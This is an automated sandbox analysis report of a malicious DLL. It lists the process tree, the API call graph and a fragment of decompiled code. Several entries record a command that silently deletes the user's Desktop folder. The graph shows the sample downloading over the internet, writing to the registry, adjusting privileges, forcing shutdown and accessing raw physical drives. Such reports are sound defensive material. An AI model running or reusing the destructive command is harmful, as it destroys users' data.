          Feb 17, 2022 20:26:29.770348072 CET8.8.8.8192.168.2.50x89f8No error (0)blogx.sina.com.cn123.126.45.92A (IP address)IN (0x0001)

          Click to jump to process

          Click to jump to process

          Click to dive into process behavior distribution

          Click to jump to process

          Target ID:1
          Start time:20:22:22
          Start date:17/02/2022
          Path:C:\Windows\System32\loaddll32.exe
          Wow64 process (32bit):true
          Commandline:loaddll32.exe "C:\Users\user\Desktop\abc.dll"
          Imagebase:0xb70000
          File size:116736 bytes
          MD5 hash:7DEB5DB86C0AC789123DEC286286B938
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          Target ID:3
          Start time:20:22:23
          Start date:17/02/2022
          Path:C:\Windows\SysWOW64\cmd.exe
          Wow64 process (32bit):true
          Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\abc.dll",#1
          Imagebase:0x150000
          File size:232960 bytes
          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          Target ID:4
          Start time:20:22:24
          Start date:17/02/2022
          Path:C:\Windows\SysWOW64\rundll32.exe
          Wow64 process (32bit):true
          Commandline:rundll32.exe C:\Users\user\Desktop\abc.dll,Dispatch
          Imagebase:0x360000
          File size:61952 bytes
          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          Target ID:5
          Start time:20:22:24
          Start date:17/02/2022
          Path:C:\Windows\SysWOW64\rundll32.exe
          Wow64 process (32bit):true
          Commandline:rundll32.exe "C:\Users\user\Desktop\abc.dll",#1
          Imagebase:0x360000
          File size:61952 bytes
          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          Target ID:6
          Start time:20:22:25
          Start date:17/02/2022
          Path:C:\Windows\SysWOW64\cmd.exe
          Wow64 process (32bit):true
          Commandline:cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
          Imagebase:0x150000
          File size:232960 bytes
          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          Target ID:7
          Start time:20:22:26
          Start date:17/02/2022
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff7ecfc0000
          File size:625664 bytes
          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          Target ID:8
          Start time:20:22:26
          Start date:17/02/2022
          Path:C:\Windows\SysWOW64\PING.EXE
          Wow64 process (32bit):true
          Commandline:ping 127.0.0.1 -n 3
          Imagebase:0x7ff797770000
          File size:18944 bytes
          MD5 hash:70C24A306F768936563ABDADB9CA9108
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          Target ID:10
          Start time:20:22:27
          Start date:17/02/2022
          Path:C:\Windows\SysWOW64\rundll32.exe
          Wow64 process (32bit):true
          Commandline:rundll32.exe C:\Users\user\Desktop\abc.dll,InputFile
          Imagebase:0x360000
          File size:61952 bytes
          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          Target ID:12
          Start time:20:22:30
          Start date:17/02/2022
          Path:C:\Windows\SysWOW64\rundll32.exe
          Wow64 process (32bit):true
          Commandline:rundll32.exe C:\Users\user\Desktop\abc.dll,PrintFile
          Imagebase:0x360000
          File size:61952 bytes
          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          Target ID:15
          Start time:20:22:32
          Start date:17/02/2022
          Path:C:\Windows\SysWOW64\WerFault.exe
          Wow64 process (32bit):true
          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4620 -s 736
          Imagebase:0xa30000
          File size:434592 bytes
          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language

          Target ID:16
          Start time:20:22:34
          Start date:17/02/2022
          Path:C:\Windows\SysWOW64\rundll32.exe
          Wow64 process (32bit):true
          Commandline:rundll32.exe "C:\Users\user\Desktop\abc.dll",Dispatch
          Imagebase:0x360000
          File size:61952 bytes
          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language

          Target ID:17
          Start time:20:22:34
          Start date:17/02/2022
          Path:C:\Windows\SysWOW64\rundll32.exe
          Wow64 process (32bit):true
          Commandline:rundll32.exe "C:\Users\user\Desktop\abc.dll",InputFile
          Imagebase:0x360000
          File size:61952 bytes
          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language

          Target ID:18
          Start time:20:22:35
          Start date:17/02/2022
          Path:C:\Windows\SysWOW64\rundll32.exe
          Wow64 process (32bit):true
          Commandline:rundll32.exe "C:\Users\user\Desktop\abc.dll",PrintFile
          Imagebase:0x360000
          File size:61952 bytes
          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language

          Target ID:19
          Start time:20:22:35
          Start date:17/02/2022
          Path:C:\Windows\SysWOW64\cmd.exe
          Wow64 process (32bit):true
          Commandline:cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
          Imagebase:0x150000
          File size:232960 bytes
          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language

          Target ID:21
          Start time:20:22:36
          Start date:17/02/2022
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff7ecfc0000
          File size:625664 bytes
          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language

          Target ID:22
          Start time:20:22:37
          Start date:17/02/2022
          Path:C:\Windows\SysWOW64\PING.EXE
          Wow64 process (32bit):true
          Commandline:ping 127.0.0.1 -n 3
          Imagebase:0x11b0000
          File size:18944 bytes
          MD5 hash:70C24A306F768936563ABDADB9CA9108
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language

          Target ID:23
          Start time:20:22:38
          Start date:17/02/2022
          Path:C:\Windows\SysWOW64\WerFault.exe
          Wow64 process (32bit):true
          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 732
          Imagebase:0xa30000
          File size:434592 bytes
          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language

          Target ID:32
          Start time:20:22:58
          Start date:17/02/2022
          Path:C:\Windows\SysWOW64\rundll32.exe
          Wow64 process (32bit):true
          Commandline:"C:\Windows\SysWOW64\rundll32.exe" "C:\Users\user\Desktop\abc.dll",Dispatch
          Imagebase:0x360000
          File size:61952 bytes
          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language

          Target ID:33
          Start time:20:22:59
          Start date:17/02/2022
          Path:C:\Windows\SysWOW64\cmd.exe
          Wow64 process (32bit):true
          Commandline:cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
          Imagebase:0x150000
          File size:232960 bytes
          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language

          Target ID:34
          Start time:20:23:00
          Start date:17/02/2022
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff7ecfc0000
          File size:625664 bytes
          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language

          Target ID:35
          Start time:20:23:01
          Start date:17/02/2022
          Path:C:\Windows\SysWOW64\PING.EXE
          Wow64 process (32bit):true
          Commandline:ping 127.0.0.1 -n 3
          Imagebase:0x11b0000
          File size:18944 bytes
          MD5 hash:70C24A306F768936563ABDADB9CA9108
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language

          Target ID:36
          Start time:20:23:07
          Start date:17/02/2022
          Path:C:\Windows\SysWOW64\rundll32.exe
          Wow64 process (32bit):true
          Commandline:"C:\Windows\SysWOW64\rundll32.exe" "C:\Users\user\Desktop\abc.dll",Dispatch
          Imagebase:0x360000
          File size:61952 bytes
          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language

          Target ID:37
          Start time:20:23:08
          Start date:17/02/2022
          Path:C:\Windows\SysWOW64\cmd.exe
          Wow64 process (32bit):true
          Commandline:cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
          Imagebase:0x150000
          File size:232960 bytes
          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language

          Target ID:38
          Start time:20:23:09
          Start date:17/02/2022
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff7ecfc0000
          File size:625664 bytes
          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language

          Target ID:39
          Start time:20:23:09
          Start date:17/02/2022
          Path:C:\Windows\SysWOW64\PING.EXE
          Wow64 process (32bit):true
          Commandline:ping 127.0.0.1 -n 3
          Imagebase:0x11b0000
          File size:18944 bytes
          MD5 hash:70C24A306F768936563ABDADB9CA9108
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language

          Reset < >

            Execution Graph

            Execution Coverage:7.7%
            Dynamic/Decrypted Code Coverage:11.8%
            Signature Coverage:3.3%
            Total number of Nodes:424
            Total number of Limit Nodes:13
            execution_graph 16601 10008020 16602 10008026 16601->16602 16603 100081e3 16602->16603 16612 10003ef4 16602->16612 16605 10008083 16615 10004770 16605->16615 16607 100080b7 16621 10005c4c 16607->16621 16609 10008114 16610 100081c9 Sleep 16609->16610 16611 100081bb 16609->16611 16610->16603 16611->16610 16636 10003ee1 wvsprintfA 16612->16636 16614 10003f06 16614->16605 16616 10004785 16615->16616 16620 10004823 16616->16620 16637 1000cbf7 16616->16637 16618 100047e0 16640 10004630 16618->16640 16620->16607 16622 10003ef4 wvsprintfA 16621->16622 16623 10005c86 16622->16623 16658 10003f72 PathFileExistsA 16623->16658 16625 10005c92 16626 10005c99 16625->16626 16627 10005c9d 16625->16627 16626->16609 16659 10004015 CreateFileA 16627->16659 16629 10005cbb 16629->16626 16660 10004035 ReadFile 16629->16660 16631 10005cd6 16661 10003f92 CloseHandle 16631->16661 16633 10005cdc 16662 10003f7d StrStrIA 16633->16662 16635 10005ce9 16635->16626 16636->16614 16647 1000cba2 16637->16647 16641 10004662 ctype 16640->16641 16642 10004762 16641->16642 16643 10004697 wsprintfA 16641->16643 16644 1000cbf7 rand 16641->16644 16645 10004630 rand 16641->16645 16655 1000cbdc 16641->16655 16642->16620 16643->16641 16644->16641 16645->16641 16648 1000cbac 16647->16648 16649 1000cbb3 16647->16649 16648->16618 16649->16648 16651 1000c3ab 16649->16651 16653 1000c3ca 16651->16653 16654 1000c3c0 16651->16654 16652 1000c780 rand 16652->16652 16652->16654 16653->16652 16653->16654 16654->16648 16656 1000cba2 rand 16655->16656 16657 1000cbf3 16656->16657 16657->16641 16658->16625 16659->16629 16660->16631 16661->16633 16662->16635 17062 10006ae3 17063 10006af2 CreateThread 17062->17063 17064 10006ae9 Sleep 17062->17064 17065 10033df6 17063->17065 17067 10006acb 17064->17067 17066 10006499 7 API calls 17066->17067 17067->17062 17067->17066 17089 10003f63 ExitWindowsEx 17043 26e002a 17044 26e002c 17043->17044 17045 26e0056 17044->17045 17052 26e0047 17044->17052 17048 26e00aa VirtualFree 17048->17045 17049 26e0045 17049->17045 17056 26e0063 17049->17056 17053 26e004b 17052->17053 17054 26e003b 17053->17054 17055 26e0063 2 API calls 17053->17055 17054->17048 17054->17049 17055->17054 17057 26e0067 17056->17057 17058 26e006b VirtualAlloc 17057->17058 17059 26e00c3 17057->17059 17058->17059 17061 26e0084 17058->17061 17059->17045 17060 26e00b5 VirtualFree 17060->17059 17061->17060 17088 26e152b GetProcAddress 16663 10005846 16664 1000584c 16663->16664 16665 10005862 16664->16665 16667 10003eb4 gethostbyname 16664->16667 16667->16665 17090 26e1509 LoadLibraryA 17078 10006b28 17079 10006b30 17078->17079 17086 10003ece CreateMutexA 17079->17086 17081 10006b61 GetLastError 17082 10006b72 CreateThread 17081->17082 17084 10006ba1 17081->17084 17083 10006b8c 17082->17083 17087 1000687e 17082->17087 17085 10006b93 Sleep 17083->17085 17086->17081 16989 26e14a4 VirtualProtect 16990 26e14df 16989->16990 16991 26e14e3 VirtualProtect 16989->16991 16990->16991 16568 26e0063 16569 26e0067 16568->16569 16570 26e006b VirtualAlloc 16569->16570 16571 26e00c3 16569->16571 16570->16571 16573 26e0084 16570->16573 16572 26e00b5 VirtualFree 16572->16571 16573->16572 17005 26e0e83 17006 26e0e8d LoadLibraryA 17005->17006 17007 26e0ea5 17006->17007 17007->17006 17008 26e0eab GetProcAddress 17007->17008 17009 26e0ec8 17007->17009 17008->17007 17027 26e0c61 17030 26e0d5d 17027->17030 17028 26e0e0c MessageBoxA ExitProcess 17029 26e0e26 17031 26e0e54 VirtualFree 17029->17031 17030->17028 17030->17029 17032 26e0dab 17030->17032 17033 26e0df0 wsprintfA 17032->17033 17034 26e0dcb 17032->17034 17033->17034 17034->17028 16574 10006b13 16577 10006acb 16574->16577 16575 10006ae9 Sleep 16575->16577 16577->16575 16578 10006af2 CreateThread 16577->16578 16580 10006499 16577->16580 16596 10033df6 16578->16596 16581 100064a3 16580->16581 16582 100064e9 wsprintfA 16581->16582 16583 10006508 16582->16583 16598 10003f0a InternetOpenA 16583->16598 16585 1000652b 16586 100066d0 16585->16586 16599 10003f24 InternetOpenUrlA 16585->16599 16586->16577 16588 1000654b 16588->16586 16592 10006559 ctype 16588->16592 16590 100065bf MultiByteToWideChar 16590->16592 16591 100065d7 MultiByteToWideChar 16591->16592 16592->16590 16592->16591 16593 10006647 16592->16593 16600 10003f41 InternetReadFile 16592->16600 16594 100066df wsprintfA 16593->16594 16595 100066b0 ctype 16593->16595 16594->16595 16595->16577 16595->16586 16597 1002e140 16596->16597 16598->16585 16599->16588 16600->16592 17035 10005e33 17036 10005e41 17035->17036 17037 10003ef4 wvsprintfA 17036->17037 17038 10005e89 17037->17038 17039 10005cf7 6 API calls 17038->17039 17040 10005edb 17039->17040 17041 10003ef4 wvsprintfA 17040->17041 17042 10005ee1 17040->17042 17041->17042 16952 10005db4 16953 10005de5 16952->16953 16964 1000409d RegQueryValueExA 16953->16964 16955 10005e16 16965 10004092 RegCloseKey 16955->16965 16957 10005e1e 16958 10003ef4 wvsprintfA 16957->16958 16959 10005e89 16958->16959 16966 10005cf7 16959->16966 16962 10005ee1 16963 10003ef4 wvsprintfA 16963->16962 16964->16955 16965->16957 16967 10003ef4 wvsprintfA 16966->16967 16968 10005d31 16967->16968 16983 10003f72 PathFileExistsA 16968->16983 16970 10005d3d 16971 10005d44 16970->16971 16972 10005d48 16970->16972 16971->16962 16971->16963 16984 10004015 CreateFileA 16972->16984 16974 10005d66 16974->16971 16985 10004035 ReadFile 16974->16985 16976 10005d81 16986 10003f92 CloseHandle 16976->16986 16978 10005d87 16987 10003f7d StrStrIA 16978->16987 16980 10005d94 16980->16971 16988 10003f7d StrStrIA 16980->16988 16982 10005da8 16982->16971 16983->16970 16984->16974 16985->16976 16986->16978 16987->16980 16988->16982 17068 10005f15 GetCurrentProcess 17075 10004126 OpenProcessToken 17068->17075 17070 10005f32 17074 10005f7e 17070->17074 17076 100040f1 LookupPrivilegeValueA 17070->17076 17072 10005f46 17072->17074 17077 1000404f AdjustTokenPrivileges 17072->17077 17075->17070 17076->17072 17077->17074 16668 10008656 16702 10005989 16668->16702 16670 10008666 16671 10008805 16670->16671 16677 1000869b 16670->16677 16672 1000882c wsprintfA 16671->16672 16673 1000884c 16672->16673 16674 10008851 Sleep 16673->16674 16675 10008865 ctype 16673->16675 16676 10008864 16674->16676 16676->16675 16678 1000871a CreateThread Sleep 16677->16678 16708 100044ad 16677->16708 16726 10033977 16678->16726 16774 10006ee7 16678->16774 16681 100086cc 16683 100086d2 16681->16683 16684 100086df 16681->16684 16682 10008745 CreateThread CreateThread Sleep 16685 1000877f 16682->16685 16759 10006b30 16682->16759 16767 10008208 16682->16767 16728 10004351 16683->16728 16690 100086e6 Sleep 16684->16690 16688 10008791 CreateThread Sleep CreateThread CreateThread 16685->16688 16689 10008785 CreateThread 16685->16689 16687 100086dd 16687->16684 16691 10004482 RegOpenKeyExA 16688->16691 16786 1000827d 16688->16786 16794 1000490f 16688->16794 16798 10006eef 16688->16798 16689->16688 16777 10007112 16689->16777 16692 100086ff 16690->16692 16693 100087cd 16691->16693 16714 10004482 16692->16714 16694 100087d1 Sleep CreateThread Sleep CreateThread 16693->16694 16695 100087f7 Sleep 16693->16695 16694->16695 16771 1000842d 16694->16771 16697 100087fc Sleep 16695->16697 16697->16697 16699 10008715 16718 10006dd5 16699->16718 16700 10008709 CreateThread 16700->16699 16751 10008578 Sleep 16700->16751 16734 1000cda0 16702->16734 16704 10005993 wsprintfA 16705 100059b6 16704->16705 16706 100059eb wsprintfA wsprintfA wsprintfA 16705->16706 16707 10005a25 16706->16707 16707->16670 16709 100044c9 16708->16709 16710 100044d9 GetExtendedUdpTable 16709->16710 16712 10004504 16709->16712 16711 100044ef 16710->16711 16711->16712 16713 10004509 GetExtendedUdpTable 16711->16713 16712->16681 16713->16712 16715 1000448d 16714->16715 16736 100040ba RegOpenKeyExA 16715->16736 16717 100044a4 16717->16699 16717->16700 16721 10006ddf 16718->16721 16719 10006ed5 16719->16678 16720 10003ef4 wvsprintfA 16722 10006ea0 16720->16722 16721->16719 16721->16720 16723 10003ef4 wvsprintfA 16722->16723 16724 10006ec9 16723->16724 16737 10006290 16724->16737 16727 10033989 16726->16727 16727->16682 16729 1000436c 16728->16729 16730 10004399 Sleep 16729->16730 16733 10004370 16729->16733 16731 100043b3 16730->16731 16732 100043e0 Sleep 16731->16732 16732->16733 16733->16687 16735 1000cda5 16734->16735 16736->16717 16738 100062a2 16737->16738 16747 10003f0a InternetOpenA 16738->16747 16740 100062a9 16741 100062da 16740->16741 16748 10003f24 InternetOpenUrlA 16740->16748 16741->16719 16743 100062c4 16749 10003f58 InternetCloseHandle 16743->16749 16745 100062d4 16750 10003f58 InternetCloseHandle 16745->16750 16747->16740 16748->16743 16749->16745 16750->16741 16752 1000859b 16751->16752 16809 100061bd 16752->16809 16755 100085cb Sleep 16755->16755 16756 100085d4 16757 100085f0 wsprintfA 16756->16757 16758 10008613 16757->16758 16760 10006b4e 16759->16760 16835 10003ece CreateMutexA 16760->16835 16762 10006b61 GetLastError 16763 10006ba1 16762->16763 16764 10006b72 CreateThread 16762->16764 16765 10006b8c 16764->16765 16836 1000687e 16764->16836 16766 10006b93 Sleep 16765->16766 16768 10008211 16767->16768 16770 10008270 Sleep 16768->16770 16838 1000400a GetDriveTypeA 16768->16838 16770->16768 16773 1000843a 16771->16773 16772 10008567 Sleep 16772->16773 16773->16772 16839 10006d08 16774->16839 16778 10007129 16777->16778 16779 10005c4c 6 API calls 16778->16779 16780 10003ef4 wvsprintfA 16778->16780 16781 100061bd 5 API calls 16778->16781 16782 100071b7 Sleep 16778->16782 16783 10007208 wsprintfA 16778->16783 16779->16778 16780->16778 16781->16778 16782->16778 16853 1000570f 16783->16853 16791 100082b8 16786->16791 16787 10005c4c 6 API calls 16787->16791 16788 10003ef4 wvsprintfA 16788->16791 16789 100061bd 5 API calls 16789->16791 16790 1000839f Sleep 16790->16791 16791->16787 16791->16788 16791->16789 16791->16790 16793 100083f0 wsprintfA 16791->16793 16882 1000721f 16791->16882 16793->16791 16795 1000497d 16794->16795 16796 10004984 socket socket 16795->16796 16797 10004999 16795->16797 16796->16797 16801 10006efc 16798->16801 16799 1000591c lstrcmpi CloseHandle CreateToolhelp32Snapshot Process32First Process32Next 16799->16801 16800 10006f30 Sleep 16800->16801 16801->16799 16801->16800 16802 10006f3d 16801->16802 16803 10005c4c 6 API calls 16802->16803 16804 10003ef4 wvsprintfA 16802->16804 16805 100061bd 5 API calls 16802->16805 16806 10007064 Sleep 16802->16806 16807 100070a3 wsprintfA 16802->16807 16808 100070d9 PrintFile PrintFile 16802->16808 16803->16802 16804->16802 16805->16802 16806->16802 16807->16802 16808->16802 16810 100061dd 16809->16810 16828 10003f0a InternetOpenA 16810->16828 16812 100061e4 16822 100061ee 16812->16822 16829 10003f24 InternetOpenUrlA 16812->16829 16814 10006206 16815 10006210 16814->16815 16816 10006219 16814->16816 16830 10003f58 InternetCloseHandle 16815->16830 16818 10006276 16816->16818 16824 1000621f 16816->16824 16833 10003f58 InternetCloseHandle 16818->16833 16820 10006216 16834 10003f58 InternetCloseHandle 16820->16834 16822->16755 16822->16756 16825 1000626c 16824->16825 16831 10003f41 InternetReadFile 16824->16831 16832 10003f92 CloseHandle 16825->16832 16827 10006274 16827->16818 16828->16812 16829->16814 16830->16820 16831->16824 16832->16827 16833->16820 16834->16822 16835->16762 16837 100266f6 16836->16837 16838->16768 16849 10003ff7 GetShortPathNameA 16839->16849 16841 10006d43 16850 1000406c RegCreateKeyExA 16841->16850 16843 10006d71 wsprintfA 16844 10006dab 16843->16844 16851 100040d4 RegSetValueExA 16844->16851 16846 10006dc4 16852 10004092 RegCloseKey 16846->16852 16848 10006dcf 16849->16841 16850->16843 16851->16846 16852->16848 16854 1000571c 16853->16854 16855 10005724 wsprintfA 16854->16855 16864 10005318 16855->16864 16857 10005776 wsprintfA wsprintfA 16866 10038f08 16857->16866 16865 10005325 16864->16865 16865->16857 16867 1002e4b3 16866->16867 16867->16866 16883 10007229 16882->16883 16912 100077b2 16883->16912 16885 1000724c 16887 1000757d 16885->16887 16888 10007280 16885->16888 16926 10007a73 16885->16926 16887->16791 16888->16887 16933 1000504d 16888->16933 16890 100072c5 16891 10007415 16890->16891 16937 10007cdc 16890->16937 16891->16887 16894 10007cdc MultiByteToWideChar 16891->16894 16893 1000730c 16893->16891 16896 1000504d MultiByteToWideChar 16893->16896 16895 100074b6 16894->16895 16895->16887 16897 1000504d MultiByteToWideChar 16895->16897 16898 1000732e SafeArrayCreate VariantInit SafeArrayCreate VariantInit 16896->16898 16899 100074db 16897->16899 16902 1000504d MultiByteToWideChar 16898->16902 16900 1000504d MultiByteToWideChar 16899->16900 16903 100074ea SafeArrayCreate VariantInit 16900->16903 16906 100073a3 16902->16906 16905 1000504d MultiByteToWideChar 16903->16905 16908 10007540 16905->16908 16907 1000504d MultiByteToWideChar 16906->16907 16910 100073dc 16907->16910 16909 1000504d MultiByteToWideChar 16908->16909 16909->16887 16911 1000504d MultiByteToWideChar 16910->16911 16911->16891 16913 100077bc 16912->16913 16914 1000504d MultiByteToWideChar 16913->16914 16925 10007981 16913->16925 16915 1000787d 16914->16915 16916 1000504d MultiByteToWideChar 16915->16916 16915->16925 16917 100078cf 16916->16917 16918 1000504d MultiByteToWideChar 16917->16918 16920 100078e1 16918->16920 16919 1000504d MultiByteToWideChar 16919->16925 16921 1000504d MultiByteToWideChar 16920->16921 16924 10007947 16920->16924 16922 10007920 16921->16922 16923 1000504d MultiByteToWideChar 16922->16923 16923->16924 16924->16919 16925->16885 16927 10007a7d 16926->16927 16928 10007aae VariantInit 16927->16928 16932 10007b0b 16927->16932 16929 1000504d MultiByteToWideChar 16928->16929 16930 10007ac7 16929->16930 16930->16932 16941 10007c3c 16930->16941 16932->16888 16934 10005057 16933->16934 16936 10005078 16934->16936 16945 100050f5 16934->16945 16936->16890 16938 10007ce6 16937->16938 16939 1000504d MultiByteToWideChar 16938->16939 16940 10007cfa 16938->16940 16939->16940 16940->16893 16942 10007c46 16941->16942 16943 10007c60 VariantInit 16942->16943 16944 10007c17 16942->16944 16943->16944 16944->16932 16948 1000d0be 16945->16948 16947 1000510c 16947->16936 16949 1000d0cd 16948->16949 16951 1000d0c9 16948->16951 16950 1000d0e6 MultiByteToWideChar 16949->16950 16950->16951 16951->16947 17091 10005f98 17092 10003ef4 wvsprintfA 17091->17092 17093 10005fb9 17092->17093 17100 10004015 CreateFileA 17093->17100 17095 10005fd9 17099 10005fe3 17095->17099 17101 10003f9d WriteFile 17095->17101 17097 10005fff 17102 10003f92 CloseHandle 17097->17102 17100->17095 17101->17097 17102->17099 17103 100043fb 17107 10041377 17103->17107 16992 26e0cb1 16994 26e0cdd 16992->16994 16995 26e0d0d 16994->16995 16996 26e0d3b VirtualAlloc 16995->16996 16998 26e0d6a 16996->16998 16997 26e0e0c MessageBoxA ExitProcess 16998->16997 16999 26e0e26 16998->16999 17001 26e0dab 16998->17001 17000 26e0e54 VirtualFree 16999->17000 17002 26e0dbb wsprintfA 17001->17002 17004 26e0dcb 17001->17004 17002->17004 17004->16997 17010 1000611f 17011 1000612c 17010->17011 17022 10003f0a InternetOpenA 17011->17022 17013 10006156 17014 100061b1 17013->17014 17023 10003f24 InternetOpenUrlA 17013->17023 17016 100061a8 17026 10003f58 InternetCloseHandle 17016->17026 17018 10006171 17018->17016 17024 10003f41 InternetReadFile 17018->17024 17020 100061a2 17025 10003f58 InternetCloseHandle 17020->17025 17022->17013 17023->17018 17024->17020 17025->17016 17026->17014

            Control-flow Graph

            APIs
            • socket.WS2_32(00000002,00000002,00000000,00000202,?), ref: 1000498A
            • socket.WS2_32(00000002,00000002,00000000), ref: 10004992
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
            Similarity
            • API ID: socket
            • String ID: 127.0.0.1$8.8.8.8
            • API String ID: 98920635-3846239810
            • Opcode ID: 484ae023bda2c9abf10d61ce06a99c516603c4f19dc912a80c719e5c4a5fa73c
            • Instruction ID: 0b70e4a6fd8a10ce365d551e74f64ff4b5dc65bee0e894cf1513fcdb4ad18bea
            • Opcode Fuzzy Hash: 484ae023bda2c9abf10d61ce06a99c516603c4f19dc912a80c719e5c4a5fa73c
            • Instruction Fuzzy Hash: 30317A76D0425CAEEB11DBE4CC85ADEBBB8EF85340F1001AAE604AB291DB756B44CF51
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 47%
            			E10008B8B(unsigned int* __ecx, void* __edx, void* __eflags, char _a4) {
            				char _v8;
            				char _v32;
            				char _v84;
            				char _v120;
            				char _v632;
            				char _v648;
            				char _v1672;
            				void* __ebx;
            				void* __edi;
            				signed int __esi;
            				void* __ebp;
            				signed char _t33;
            				void* _t35;
            				signed char _t37;
            				unsigned int* _t39;
            				void* _t40;
            				char _t44;
            				void* _t45;
            				void* _t46;
            				void* _t48;
            				void* _t49;
            				void* _t51;
            
            				_t39 = __ecx;
            				_push(_t48);
            				_t33 = E10029F3F( &_v84, __eflags,  &_v84, "\\\\.\\PHYSICALDRIVE%d", _a4, _t46);
            				if(__eflags != 0) {
            					_t35 = (_t33 | 0x00000091) + 1;
            					do {
            						 *(_t51 + _t48 - 0x100) =  *_t39 >> 8;
            						_t44 =  *_t39;
            						_t49 = _t48 + 1;
            						_t39 =  &(_t39[1]);
            						 *((char*)(_t51 + _t49 - 0x100)) = _t44;
            						_t48 = _t49 + 1;
            						_t35 = _t35 - 1;
            					} while (_t35 != 0);
            					 *(_t51 + _t48 - 0x100) =  *(_t51 + _t48 - 0x100) & 0x00000000;
            					_t45 = 0;
            					_t40 = 0;
            					if(_t48 > 0) {
            						do {
            							_t37 =  *((intOrPtr*)(_t51 + _t40 - 0x100));
            							if(_t37 != 0 && _t37 != 0x20) {
            								 *(_t45 + 0x10017ba0) = _t37;
            								_t45 = _t45 + 1;
            							}
            							_t40 = _t40 + 1;
            						} while (_t40 < _t48);
            					}
